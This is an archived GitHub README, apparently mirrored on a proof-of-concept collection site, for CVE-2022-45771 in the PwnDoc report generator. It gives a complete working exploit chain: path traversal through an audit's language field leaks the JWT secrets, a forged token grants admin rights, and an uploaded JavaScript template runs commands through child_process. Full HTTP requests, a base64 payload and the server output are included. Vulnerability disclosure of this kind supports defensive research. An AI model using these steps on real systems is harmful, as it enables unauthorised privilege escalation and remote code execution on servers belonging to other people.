Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-45771 PoC — Pwndoc 安全漏洞

Source
https://github.com/yuriisanin/CVE-2022-45771
Associated Vulnerability
Title:Pwndoc 安全漏洞 (CVE-2022-45771)
Description:PwnDoc是一个应用软件。渗透测试报告生成器。 Pwndoc v0.5.3版本存在安全漏洞,该漏洞源于组件/api/audits 中存在问题,允许攻击者通过上传精心制作的审计文件来提升权限并执行任意代码。
Description
[PoC] Privilege escalation & code execution via LFI in PwnDoC
Readme
# CVE-2022-45771

The [PwnDoc](https://github.com/pwndoc/pwndoc) is vulnerable to both path traversal and local file inclusion (LFI), which allows unprivileged users to disclose JWT secrets and achive code execution.

Requirements:

- An attacker has valid account with `user` role
- The application has a report template with either `finding.vulnType` or `finding.category` tag

[![video-poc](https://github.com/yuriisanin/CVE-2022-45771/blob/c59b0b65b2b319ef950ec99ed1ea62e4b5e7235c/demo-banner.png)](https://youtu.be/jffBkEdF7RY)

## Details

The vulnerability chain consists of the next parts:

1. Missing validation of `AuditSchema.language` property on both model and endpoint levels. (See [/backend/src/models/audit.js, line: 71](https://github.com/pwndoc/pwndoc/blob/40a78f61cb21dfeab7135557940c4c40421d3226/backend/src/models/audit.js), [/backend/src/routes/audit.js, line: 57](https://github.com/pwndoc/pwndoc/blob/40a78f61cb21dfeab7135557940c4c40421d3226/backend/src/routes/audit.js))
2. Use of `require` function with user-supplied `AuditSchema.language` parameter during report generation. (See [/backend/src/translate/index.js, line: 10](https://github.com/pwndoc/pwndoc/blob/40a78f61cb21dfeab7135557940c4c40421d3226/backend/src/translate/index.js), [/backend/src/lib/report-generator.js, lines: 24-25, 477, 487](https://github.com/pwndoc/pwndoc/blob/40a78f61cb21dfeab7135557940c4c40421d3226/backend/src/lib/report-generator.js))
3. Exposed `jwtSecret` and `jwtRefreshSecret` parameters via module exports in `auth.js` file. (See [/backend/src/lib/auth.js, lines: 17-21](https://github.com/pwndoc/pwndoc/blob/40a78f61cb21dfeab7135557940c4c40421d3226/backend/src/lib/auth.js))
4. Insecure template file upload functionality allows uploading `js` files (requires `template:create` permission).


## [PoC] JWT secret disclosure leads to privilege escalation

1. Create an audit with `../lib/auth.js` as `language`, later the file will be loaded and executed using `require` function and as a result both `jwtSecret` and `jwtRefreshSecret` will be exported.

Request:
```http
POST /api/audits HTTP/1.1
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=utf-8
Origin: https://127.0.0.1:8443
Content-Length: 73
Accept-Language: en-GB,en;q=0.9
Host: 127.0.0.1:8443
User-Agent: {user-agent}
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: token=JWT%20{token}


{"name":"privesc-poc","language":"../lib/auth.js","auditType":"tested"}
```

Response:
```http
HTTP/1.1 201 Created
Server: nginx/1.22.1
Date: Sun, 20 Nov 2022 15:34:32 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 598
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Methods: GET,POST,DELETE,PUT,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Expose-Headers: Content-Disposition

{"status":"success","datas":{"message":"Audit created successfully","audit":{"collaborators":[],"reviewers":[],"state":"EDIT","approvals":[],"_id":"637a49086f5a2e0012dd58c5","name":"privsec-poc","language":"../lib/auth.js","auditType":"tested","creator":"637a2065ab932e0012015580","sections":[],"customFields":[],"sortFindings":[{"category":"jjj","sortValue":"cvssScore","sortOrder":"desc","sortAuto":true},{"category":"dd","sortValue":"cvssScore","sortOrder":"desc","sortAuto":true}],"scope":[],"findings":[],"createdAt":"2022-11-20T15:34:32.246Z","updatedAt":"2022-11-20T15:34:32.246Z","__v":0}}}
```

2. Set a report template for the audit. Note that template should contain either `finding.vulnType - {vulnType}` or `finding.category - {category}` tag. See [templating doc](https://pwndoc.github.io/pwndoc/#/docxtemplate?id=findings)**

Request:
```http
PUT /api/audits/637a49086f5a2e0012dd58c5/general HTTP/1.1
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=utf-8
Origin: https://127.0.0.1:8443
Content-Length: 207
Accept-Language: en-GB,en;q=0.9
Host: 127.0.0.1:8443
User-Agent: {user-agent}
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: token=JWT%20{token}


{"collaborators":[],"reviewers":[],"_id":"637a49086f5a2e0012dd58c5","name":"privesc-poc","language":"../lib/auth.js","auditType":"tested","customFields":[],"template":"6377d57e5cccb10012049dbb","scope":[]}
```

Response:
```http
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 20 Nov 2022 15:34:43 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 65
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Methods: GET,POST,DELETE,PUT,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Expose-Headers: Content-Disposition

{"status":"success","datas":"Audit General updated successfully"}
```

3. Add finding to the audit. Note that either `category` or `vulnType` property should contain `jwtSecret`.**

Request:
```http
POST /api/audits/637a49086f5a2e0012dd58c5/findings HTTP/1.1
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=utf-8
Origin: https://127.0.0.1:8443
Content-Length: 368
Accept-Language: en-GB,en;q=0.9
Host: 127.0.0.1:8443
User-Agent: {user-agent}
Referer: https://127.0.0.1:8443/audits/637a2106ab932e0012015583/findings/add
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: token=JWT%20{token}

{"title":"dsdsd","vulnType":"prod","description":"{description}","observation":"{observation}","references":[],"cvssv3":"CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L","category":null,"customFields":[], "category":"jwtSecret", "vulnType":"jwtRefreshSecret"}
```

Response:
```http
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 20 Nov 2022 15:34:54 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 65
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Methods: GET,POST,DELETE,PUT,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Expose-Headers: Content-Disposition

{"status":"success","datas":"Audit Finding created successfully"}
```

4. Generate a report for the previously create audit, and get `jwtSecret`'s value from the created `docx` document.

Request:
```http
GET /api/audits/637a49086f5a2e0012dd58c5/generate HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br
Host: 127.0.0.1:8443
User-Agent: {user-agent}
Accept-Language: en-GB,en;q=0.9
Referer: https://127.0.0.1:8443/audits/637a2106ab932e0012015583/findings/add
Connection: keep-alive
Cookie: token=JWT%20{token}


```

Response:
```http
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 20 Nov 2022 15:37:34 GMT
Content-Type: application/octet-stream
Content-Length: 98134
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Methods: GET,POST,DELETE,PUT,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Expose-Headers: Content-Disposition
Content-Disposition: attachment; filename="rce-poc.docx"

{doc-content}
```

5. Change the `role` field to `admin` inside your JWT token and sign it using obtained `jwtSecret`.

JWT paload:
```json
{
  "id": "637a2065ab932e0012015580",
  "username": "justuser",
  "role": "admin",
  "firstname": "justuser",
  "lastname": "justuser",
  "email": "justuser@0d.tf",
  "phone": "12345",
  "roles": [
    "audits:create",
    "audits:read",
    "audits:update",
    "audits:delete",
    "images:create",
    "images:read",
    "clients:create",
    "clients:read",
    "clients:update",
    "clients:delete",
    "companies:create",
    "companies:read",
    "companies:update",
    "companies:delete",
    "languages:read",
    "audit-types:read",
    "vulnerability-types:read",
    "vulnerability-categories:read",
    "sections:read",
    "templates:read",
    "users:read",
    "roles:read",
    "vulnerabilities:read",
    "vulnerability-updates:create",
    "custom-fields:read",
    "settings:read-public"
  ],
  "iat": 1668958053,
  "exp": 1668958953
}

```

## [PoC] Achieving code execution 

After revealing JWT secret and adding ethier `admin` role or `template:create` permission, an attacker could use path traversal attack to execute JS code uploaded using template upload functionality.  

1. Upload `js` file using report upload functionality.

Request:
```http
POST /api/templates HTTP/1.1s
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=utf-8
Origin: https://127.0.0.1:8443
Content-Length: 571
Accept-Language: en-GB,en;q=0.9
Host: 127.0.0.1:8443
User-Agent: {user-agent}
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: token=JWT%20{token}

{"name":"exploit-poc","file":"Y29uc29sZS5sb2coJ1tQT0NdIC0gU3RhcnQgb2YgY29kZSBleGVjdXRpb24uJyk7Cgpjb25zdCB7IGV4ZWMgfSA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKTsKCmV4ZWMoImxzIC1sYSIsIChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpID0+IHsKICAgIGlmIChlcnJvcikgewogICAgICAgIGNvbnNvbGUubG9nKGBlcnJvcjogJHtlcnJvci5tZXNzYWdlfWApOwogICAgICAgIHJldHVybjsKICAgIH0KICAgIGlmIChzdGRlcnIpIHsKICAgICAgICBjb25zb2xlLmxvZyhgc3RkZXJyOiAke3N0ZGVycn1gKTsKICAgICAgICByZXR1cm47CiAgICB9CiAgICBjb25zb2xlLmxvZyhgc3Rkb3V0OiAke3N0ZG91dH1gKTsKfSk7CmNvbnNvbGUubG9nKCdbUE9DXSAtIEVuZCBvZiBjb2RlIGV4ZWN1dGlvbi4nKTsK","ext":"js"}
```

Response:
```http
HTTP/1.1 201 Created
Server: nginx/1.22.1
Date: Sun, 20 Nov 2022 15:36:24 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 95
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Methods: GET,POST,DELETE,PUT,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Expose-Headers: Content-Disposition

{"status":"success","datas":{"_id":"637a49786f5a2e0012dd58c7","name":"exploit-poc","ext":"js"}}
```

The content of the file is base64 encoded JS code:
```js
console.log('[POC] - Start of code execution.');

const { exec } = require("child_process");

exec("ls -la", (error, stdout, stderr) => {
    if (error) {
        console.log(`error: ${error.message}`);
        return;
    }
    if (stderr) {
        console.log(`stderr: ${stderr}`);
        return;
    }
    console.log(`stdout: ${stdout}`);
});
console.log('[POC] - End of code execution.');

```

2. Create an audit with `../../report-templates/exploit-poc.js` as `AuditSchema.language` property, later the file will be loaded and executed using `require` function.

Request:
```http
POST /api/audits HTTP/1.1
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=utf-8
Origin: https://127.0.0.1:8443
Content-Length: 130
Accept-Language: en-GB,en;q=0.9
Host: 127.0.0.1:8443
User-Agent: {user-agent}
Referer: https://127.0.0.1:8443/audits
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: token=JWT%20{token-with-privileges}

{"name":"rce-poc","language":"../../report-templates/exploit-poc.js","auditType":"tested"}
```

Response:
```http
HTTP/1.1 201 Created
Server: nginx/1.22.1
Date: Sun, 20 Nov 2022 15:36:37 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 617
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Methods: GET,POST,DELETE,PUT,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Expose-Headers: Content-Disposition

{"status":"success","datas":{"message":"Audit created successfully","audit":{"collaborators":[],"reviewers":[],"state":"EDIT","approvals":[],"_id":"637a49856f5a2e0012dd58c8","name":"rce-poc","language":"../../report-templates/exploit-poc.js","auditType":"tested","creator":"637a2065ab932e0012015580","sections":[],"customFields":[],"sortFindings":[{"category":"jjj","sortValue":"cvssScore","sortOrder":"desc","sortAuto":true},{"category":"dd","sortValue":"cvssScore","sortOrder":"desc","sortAuto":true}],"scope":[],"findings":[],"createdAt":"2022-11-20T15:36:37.885Z","updatedAt":"2022-11-20T15:36:37.885Z","__v":0}}}
```

3. Set any valid template for the audit.

Request:
```http
PUT /api/audits/637a49856f5a2e0012dd58c8/general HTTP/1.1
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=utf-8
Origin: https://127.0.0.1:8443
Content-Length: 224
Accept-Language: en-GB,en;q=0.9
Host: 127.0.0.1:8443
User-Agent: {user-agent}
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: token={token-with-privileges}

{"collaborators":[],"reviewers":[],"_id":"637a49856f5a2e0012dd58c8","name":"rce-poc","language":"../../report-templates/exploit-poc.js","auditType":"tested","customFields":[],"template":"6377d57e5cccb10012049dbb","scope":[]}
```

Response:
```http
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 20 Nov 2022 15:37:02 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 65
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Methods: GET,POST,DELETE,PUT,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Expose-Headers: Content-Disposition

{"status":"success","datas":"Audit General updated successfully"}
```

4. Trigger report generation to achieve code execution.

Request:
```http
GET /api/audits/637a49856f5a2e0012dd58c8/generate HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br
Host: 127.0.0.1:8443
User-Agent: {user-agent}
Accept-Language: en-GB,en;q=0.9
Referer: https://127.0.0.1:8443/audits/637a2106ab932e0012015583/findings/add
Connection: keep-alive
Cookie: token=JWT%20{token}

```

Response:
```http
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 20 Nov 2022 15:37:34 GMT
Content-Type: application/octet-stream
Content-Length: 98134
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Methods: GET,POST,DELETE,PUT,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Expose-Headers: Content-Disposition
Content-Disposition: attachment; filename="rce-poc.docx"

{doc-content}
```

The following logs should appear:
```
pwndoc-backend     | [POC] - Start of code execution.
pwndoc-backend     | [POC] - End of code execution.
pwndoc-backend     | stdout: total 1156
pwndoc-backend     | drwxr-xr-x    1 root     root          4096 Nov 18 12:05 .
pwndoc-backend     | drwxr-xr-x    1 root     root          4096 Nov 18 13:00 ..
pwndoc-backend     | -rw-r--r--    1 root     root            23 Nov 18 11:43 .dockerignore
pwndoc-backend     | -rw-r--r--    1 root     root           266 Nov 18 11:43 Dockerfile
pwndoc-backend     | -rw-r--r--    1 root     root           249 Nov 18 11:43 Dockerfile.dev
pwndoc-backend     | -rw-r--r--    1 root     root           250 Nov 18 11:43 Dockerfile.test
pwndoc-backend     | -rw-r--r--    1 root     root           412 Nov 18 11:43 README.md
pwndoc-backend     | -rw-r--r--    1 root     root           204 Nov 18 11:43 babel.config.js
pwndoc-backend     | -rw-r--r--    1 root     root           749 Nov 18 11:43 docker-compose.dev.yml
pwndoc-backend     | -rw-r--r--    1 root     root           367 Nov 18 11:43 docker-compose.test.yml
pwndoc-backend     | -rw-r--r--    1 root     root            67 Nov 18 11:43 jest.config.js
pwndoc-backend     | drwxr-xr-x  594 root     root         20480 Nov 18 12:05 node_modules
pwndoc-backend     | -rw-r--r--    1 root     root       1100446 Nov 18 11:43 package-lock.json
pwndoc-backend     | -rw-r--r--    1 root     root          1255 Nov 18 11:43 package.json
pwndoc-backend     | drwxr-xr-x   10 root     root           320 Nov 20 15:36 report-templates
pwndoc-backend     | drwxr-xr-x    7 root     root          4096 Nov 18 12:04 src
pwndoc-backend     | drwxr-xr-x    2 root     root          4096 Nov 18 12:04 ssl
pwndoc-backend     | drwxr-xr-x    2 root     root          4096 Nov 18 12:04 tests
pwndoc-backend     | 

```

## Support

You can follow me on [Twitter](https://twitter.com/SaninYurii), [GitHub](https://github.com/yuriisanin) or [YouTube](https://www.youtube.com/channel/UCLN2EvGxtnucEdrI21PmJZg).
File Snapshot

 [4.0K]  /data/pocs/e1625a6f439a011d8f28667a9acdf0bf0675ecd8
├── [214K]  demo-banner.png
└── [ 16K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.